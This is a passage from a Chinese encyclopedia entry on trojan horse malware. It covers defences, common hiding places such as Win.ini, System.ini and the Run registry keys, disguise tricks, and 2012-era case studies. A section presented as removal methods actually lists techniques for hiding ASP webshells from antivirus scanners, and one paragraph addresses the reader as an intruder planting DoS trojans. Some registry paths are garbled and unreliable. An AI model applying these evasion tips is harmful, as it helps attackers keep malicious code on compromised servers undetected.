(控制端)建立连接，并且监听端口一般开在80，所以如果没有合适的工具、丰富的经验真的很难防范。这类木马的典型代表就是“网络神偷”。由于这类木马仍然要在注册表中建立键值注册表的变化就不难查到它们。同时，最新的天网防火墙(如我们在第三点中所讲的那样)，因此只要留意也可在网络神偷服务端进行主动连接时发现它。
防范方法/木马
木马随着病毒编写技术的发展，木马程序对用户的威胁越来越大，尤其是一些木马程序采用了极其狡猾的手段来隐蔽自己，使普通用户很难在中毒后发觉。防治木马的危害，应该采取以下措施：第一，安装杀毒软件和个人，并及时升级。第二，把个人防火墙设置好安全等级，防止未知程序向外传送数据。第三，可以考虑使用安全性比较好的浏览器和电子邮件客户端工具。第四，如果使用，应该安装卡卡安全助手，防止恶意网站在自己电脑上安装不明软件和浏览器插件，以免被木马趁机侵入。
专杀方法/木马
木马远程控制的木马有：冰河（国人的骄傲，中国第一款木马），灰鸽子，上兴，，网络神偷，FLUX等。专杀方法1.加密法常用的是MS的源码加密工具screnc.exe。优点：见效明显，一般的有害代码用工具加密后，可以存在于服务器，发挥源有功能，缺点：代码经过加密后为不可识别字符，可就是常说的不可逆。2.大小写转换把被杀程序的代码大小写稍做转换，对aspx马免杀很有效果3.浑水摸鱼法如把：fso写成“f”&vbs&“s”&vbs&“o”，运行的结果一样，却达到了免杀的目的。4.图片法或者组合法把asp木马的代码保存为.jpg，引用，或把asp木马的很多代码分别分配到1.asp，2.asp，3.asp.....，再通过#include合并起来，可逃过and条件的杀毒软件5.移位，逆位，添零法属于加密形式6.asp结构特征法在程序开头和结尾加上图片数据库之类的特征码，改变本身结构。
藏身之地/木马
木马是一种基于远程控制的病毒程序，该程序具有很强的隐蔽性和危害性，它可以在人不知鬼不觉的状态下控制你或者监视你。下面就是木马潜伏的诡招，看了以后不要忘记采取绝招来对付这些损招。
1、集成到程序中
其实木马也是一个服务器――客户端程序，它为了不让用户能轻易地把它删除，就常常集成到程序里，一旦用户激活木马程序，那么木马文件和某一应用程序捆绑在一起，然后上传到服务端覆盖原文件，这样即使木马被删除了，只要运行捆绑了木马的应用程序，木马又会被安装上去了。绑定到某一应用程序中，如绑定到系统文件，那么每一次Windows启动均会启动木马。
2、隐藏在配置文件中
木马实在是太狡猾，知道菜鸟们平时使用的是图形化界面的操作系统，对于那些已经不太重要的配置文件大多数是不闻不问了，这正好给木马提供了一个藏身之处。而且利用配置文件的特殊作用，木马很容易就能在大家的计算机中运行、发作，从而偷窥或者监视大家。不过，这种方式不是很隐蔽，容易被发现，所以在Autoexec.bat和Config.sys中加载木马程序的并不多见，但也不能因此而掉以轻心。
3、潜伏在Win.ini中
木马要想达到控制或者监视计算机的目的，必须要运行，然而没有人会傻到自己在自己的计算机中运行这个该死的木马。当然，木马也早有心理准备，知道人类是高智商的动物，不会帮助它工作的，因此它必须找一个既安全又能在系统启动时自动运行的地方，于是潜伏在Win.ini中是木马感觉比较惬意的地方。大家不妨打开Win.ini来看看，在它的[windows]字段中有启动命令“load=”和“run=”，在一般情况下“=”后面是空白的，如果有后跟程序，比方说是这个样子：run=c：windowsfile.&Exeload=c：windowsfile.exe。这时你就要小心了，这个file.exe很可能是木马。
4、伪装在普通文件中
这个方法出现的比较晚，不过很流行，对于不熟练的windows操作者，很容易上当。具体方法是把可执行文件伪装成图片或文本——在程序中把图标改成Windows的默认图片图标，再把文件名改为*.jpg.exe，由于Win98默认设置是“不显示已知的文件后缀名”，文件将会显示为*.jpg，不注意的人一点这个图标就中木马了（如果你在程序中嵌一张图片就更完美了）。
5、内置到注册表中
上面的方法让木马着实舒服了一阵，既没有人能找到它，又能自动运行，真是快哉！然而好景不长，人类很快就把它的马脚揪了出来，并对它进行了严厉的惩罚！但是它还心有不甘，总结了失败教训后，认为上面的藏身之处很容易找，注册表！的确注册表由于比较复杂，木马常常喜欢藏在这里快活，赶快检查一下，有什么程序在其下，睁大眼睛仔细看了，别放过木马：
HKEY_LOCAL_MACHINE\Software\Microsof\tWindows\CurrentVersion\&下所有以“run”开头的键值；&HKEY_CURRENT_USER\Software\Microsof\tWindows\CurrentVersion\&下所有以“run”开头的键值；&HKEY-USERS\.Default\Software\Microsoft\Windows\CurrentVersion\&下所有以“run”开头的键值。
6、在驱动程序中藏身
木马真是无处不在呀！什么地方有空子，它就往哪里钻！这不，Windows安装目录下的System.ini也是木马喜欢隐蔽的地方。还是小心点，打开这个文件看看，它与正常文件有什么不同，在该文件的[boot]字段中，是不是有这样的内容，那就是shell=Explorer.exe&file.exe，如果确实有这样的内容，那你就不幸了，因为这里的file.exe就是木马服务端程序！另外，在System.ini中的[386Enh]字段，要注意检查在此段内的“driver=路径程序名”，这里也有可能被木马所利用。再有，在System.ini中的[mic]、[drivers]、[drivers32]这三个字段，这些段也是起到加载驱动程序的作用，但也是增添木马程序的好场所，你该知道也要注意这里。
7、隐形于启动组中
有时木马并不在乎自己的行踪，它更注意的是能否自动加载到系统中，因为一旦木马加载到系统中，任你用什么方法你都无法将它赶跑（哎，这木马脸皮也真是太厚），因此按照这个逻辑，启动组也是木马可以藏身的好地方，因为这里的确是自动加载运行的好场所。假设启动组对应的文件夹为：
C:\windows\startmenu\programs\startup
在注册表中的位置：
HKEY_CURRENT_USER\Softwar\eMicrosoft\Windows\&CurrentVersio\nExplorer\ShellFolders\Startup=&“C：windows\startmenu\programs\startup”
要注意经常检查启动组。
8、在Winstart.bat中
按照上面的逻辑理论，凡是利于木马能自动加载的地方，木马都喜欢待。这不，Winstart.bat也是一个能自动被Windows加载运行的文件，它多数情况下为应用程序及Windows自动生成，在执行了Win.&com并加载了多数驱动程序之后开始执行（这一点可通过启动时按F8键再选择逐步跟踪启动过程的启动方式可得知）。由于Autoexec.bat的功能可以由Winstart.bat代替完成，因此木马完全可以像在Autoexec.bat中那样被加载运行，危险由此而来。
9、捆绑在启动文件中
即应用程序的启动配置文件，控制端利用这些文件能启动程序的特点，将制作好的带有木马启动命令的同名文件上传到服务端覆盖这同名文件，这样就可以达到启动木马的目的了。
10、设置在超级连接中
木马的主人在网页上放置恶意代码，引诱用户点击，用户点击的结果不言而喻：开门揖盗！奉劝不要随便点击网页上的链接，除非你了解它，信任它。
危害网站/木马
恶意程序破坏网站
页面中的木马主要指的就是利用网站建设的安全漏洞来窃取网站机密的工具。其通过执行嵌入在网页HTML超文本标记语言内的Java&Applet小应用程序，JavaScript脚本语言程序，ActiveX软件部件网络交互技术支持可自动执行的代码程序，以强行修改用户操作系统的注册表设置及系统实用配置程序，或非法控制系统资源盗取用户文件，或恶意删除硬盘文件、格式化硬盘为行为目标的非法恶意程序。这种非法恶意程序能够得以被自动执行，在于它完全不受用户的控制。一旦浏览含有该病毒的网页，即可以在你不知不觉的情况下马上中招，给用户的系统带来一般性的、轻度性的、严重恶性等不同程度的破坏。
下载存在漏洞
网站建设中一旦被发现有木马的痕迹，主要原因就是在其它站点下载所致，目前国内的大多数中小网站都是从网络上下载的免费系统建成的，这些系统在设计的时候存在或多或少的安全漏洞，如动网和动易以前都存在过上传漏洞，导致骇客可以上传木马至网站，轻易获得管理权限。同时Win2003本身也存在设计缺陷，如前段时间出现的新漏洞：“IIS6&目录检查漏洞”。
伪装方式/木马
鉴于木马病毒的危害性，很多人对木马知识还是有一定了解的，这对木马的传播起了一定的抑制作用，这&是木马设计者所不愿见到的，因此他们开发了多种功能来伪装木马，以达到降低用户警觉，欺骗用户的目的。
当你在E-MAIL的附件中看到这个图标时，是否会认为这是个文本文件呢?但是我不得不告&诉你,这也有可能是个木马程序，&已经有木马可以将木马服务端程序的图标改成HTML,TXT,ZIP等各种文件的图标，这有相当大的迷&惑性，但是提供这种功能的木马还不多见，并且这种&伪装也不是无懈可击的，所以不必整天提心吊胆，疑神疑鬼的。
这种伪装手段是将木马捆绑到一个安装程序上，当安装程序运行时，木马在用户毫无察觉的情况下，偷偷的进入了系统。至于被捆绑的文件一般是可执行文件（即EXE,COM一类的文件）。
有一定木马知识的人都知道，如果打开一个文件，没有任何反应，这很可能就是个木马程序，木马的设计者也意识到了这个缺陷，所以已经有木马提供了一个叫做出错显示的功能。当服务端用户打开木马程序时，会弹出一个错误提示框（这当然是假的），错误内容可自由&定义，大多会定制成&一些诸如“文件已破坏，无法打开的！”之类的信息，当服务端用户信以&为真时，木马却悄悄侵入了系统。
很多老式的木马端口都是固定的，这给判断是否感染了木马带来了方便，只要查一下特定的&端口就&知道感染了什么木马，所以很多新式的木马都加入了定制端口的功能，控制端用户可&以在1024---65535之间任选一个端口作为木马端口（一般不选1024以下的端口），这样就给判断&所感染木马类型带&来了麻烦。
这项功能是为了弥补木马的一个缺陷。我们知道当服务端用户打开含有木马的文件后，木马会将自己拷贝到WINDOWS的系统文件夹中（C:WINDOWS或C:WINDOWSSYSTEM目录下），一般来说&原木马文件&和系统文件夹中的木马文件的大小是一样的（捆绑文件的木马除外），那么中了木马&的朋友只要在收到的信件和下载的软件中找到原木马文件，然后根据原木马的大小去系统&文件夹找相同大小的文件，判断一下哪个是木马就行了。而木马的自我销毁功能是指安装完木马后，原木马文件将自动销毁，这样服务端用户就很难找到木马的来源，在没有查杀木马的工&具帮助下，就很难删除木马了。
安装到系统文件夹中的木马的文件名一般是固定的，那么只要根据一些查杀木马的文章，按&图索骥在系统文件夹查找特定的文件，就可以断定中了什么木马。所以有很多木马都允许控&制端用户自由定制安装后的木马文件名，这样很难判断所感染的木马类型了。
相关案例/木马
因好莱坞大片《特洛伊》而一举成名的“木马”（Trojan），在互联网时代让无数网民深受其害。无论是“网购”、“网银”还是“网游”的账户密码，只要与钱有关的网络交易，都是当下木马攻击的重灾区，用户稍有不慎极有可能遭受重大钱财损失甚至隐私被窃。以下列举一些案例。
No1：“支付大盗”“支付大盗”木马出现在百度搜索结果首位
日，一款名为“支付大盗”的新型网购木马被发现。木马网站利用百度排名机制伪装为“阿里旺旺官网”，诱骗网友下载运行木马，再暗中劫持受害者网上支付资金，把付款对象篡改为黑客账户。
No2：“新鬼影”
“新鬼影”借《江南Style》疯传。
火遍全球的《江南Style》很不幸被一种名为“新鬼影”的木马盯上了。此木马主要寄生在硬盘MBR（主引导扇区）中，如果用户电脑没有开启安全软件防护，中招后无论重装系统还是格式化硬盘，都无法将其彻底清除干净。
No3：“图片大盗”
“图片大盗”最爱私密照。
绝大多数网民都有一个困惑，为什么自己电脑中的私密照会莫名其妙的出现在网上。“图片大盗”木马运行后会全盘扫描搜集JPG、PNG格式图片，并筛选大小在100KB到2MB之间的文件，暗中将其发送到黑客服务器上，对受害者隐私造成严重危害。
No4：“浮云”
“浮云”木马震惊全国。
盗取网民钱财高达千万元的“浮云”成为了2012年度震惊全国的木马。首先诱骗网民支付一笔小额假订单，却在后台执行另外一个高额定单，用户确认后，高额转账资金就会进入黑客的账户。该木马可以对20多家银行的网上交易系统实施盗窃
No5：“黏虫”
“黏虫”木马专盗QQ。
“黏虫”木马制造的虚假QQ登录框
“QQ黏虫”在2011年度就被业界评为十大高危木马之一，2012年该木马变种卷土重来，伪装成QQ登录框窃取用户QQ帐号及密码。值得警惕的是不法分子盗窃QQ后，除了窃取帐号关联的虚拟财产外，还有可能假冒身份向被害者的亲友借钱。
No6：“怪鱼”
“怪鱼”木马袭击微博。
2012年十一长假刚刚结束，一种名为“怪鱼”的新型木马开始肆虐网络。该木马充分利用了新兴的社交网络，在中招电脑上自动登录受害者微博帐号，发布虚假中奖等钓鱼网站链接，绝对是2012年最具欺骗性的钓鱼攻击方式之一。
No7：“打印机木马”
“打印机木马”疯狂消耗纸张。
打印机木马病毒疯狂打印纸张
2012年6月，号称史上最不环保的“打印机木马”（Trojan.Milicenso）现身，美国、印度、北欧等地区大批企业电脑中招，导致数千台打印机疯狂打印毫无意义的内容，直到耗完纸张或强行关闭打印机才会停止。
No8：“网银刺客”
“网银刺客”木马暗算多家网银。
2012年“3.15”期间大名鼎鼎的“网银刺客”木马开始大规模爆发，该木马恶意利用某截图软件，把正当合法软件作为自身保护伞，从而避开了不少杀毒软件的监控。运行后会暗中劫持网银支付资金，影响十余家主流网上银行。
No9：“遥控弹窗机”
“遥控弹窗机”木马爱上偷菜。
“遥控弹窗机”是一款伪装成“QQ农牧餐大师”等游戏外挂的恶意木马，运行后会劫持正常的QQ弹窗，不断弹出大量低俗页面及网购钓鱼弹窗，并暗中与黑客服务器连接，随时获取更新指令，使受害者面临网络帐号被盗、个人隐私泄露的危险。
No10：“Q币木马”
“Q币木马”元旦来袭。
新年历来是木马病毒活跃的高峰期，2012元旦爆发的“Q币木马”令不少网民深受其害。该木马伪造“元旦五折充值Q币”的虚假QQ弹窗，诱骗中招用户在Q币充值页面上进行支付，充值对象则被木马篡改为黑客的QQ号码，相当于掏钱替黑客买Q币。
No11:&“修改中奖号码”
2009年6月，深圳一起涉及3305万元的福利彩票诈骗案成了社会关注的焦点，深圳市某技术公司软件开发工程师程某，利用在深圳福彩中心实施技术合作项目的机会，通过木马程序，攻击了存储福彩信息的数据库，并进一步进行了篡改彩票中奖数据的恶意行为，以期达到其牟取非法利益的目的。
攻击木马/木马
随着DOS攻击越来越广泛的应用，被用作DOS攻击的木马也越来越流行起来。当你入侵了一台机器，给他种上DOS攻击木马，那么日后这台计算机就成为你DOS攻击的最得力助手了。你控制的肉鸡数量越多，你发动DOS攻击取得成功的机率就越大。所以，这种木马的危害不是体现在被感染计算机上，而是体现在攻击者可以利用它来攻击一台又一台计算机，给网络造成很大的伤害和带来损失。还有一种类似DOS的木马叫做邮件炸弹木马，一旦机器被感染，木马就会随机生成各种各样主题的信件，对特定的邮箱不停地发送邮件，一直到对方瘫痪、不能接受邮件为止。
&|&相关影像
互动百科的词条（含所附图片）系由网友上传，如果涉嫌侵权，请与客服联系，我们将按照法律之相关规定及时进行处理。未经许可，禁止商业网站等复制、抓取本站内容；合理使用者，请注明来源于。
登录后使用互动百科的服务，将会得到个性化的提示和帮助，还有机会和专业认证智愿者沟通。
此词条还可添加&
编辑次数：28次
参与编辑人数：20位
最近更新时间： 02:22:05
贡献光荣榜}